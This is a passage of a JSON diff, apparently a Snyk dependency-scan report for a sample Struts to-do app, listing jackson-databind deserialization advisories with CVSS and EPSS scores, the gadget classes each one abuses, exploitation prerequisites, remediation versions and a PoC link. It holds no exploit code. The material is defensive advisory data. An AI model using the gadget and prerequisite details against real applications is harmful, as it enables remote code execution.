gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + 
"groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + 
"assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 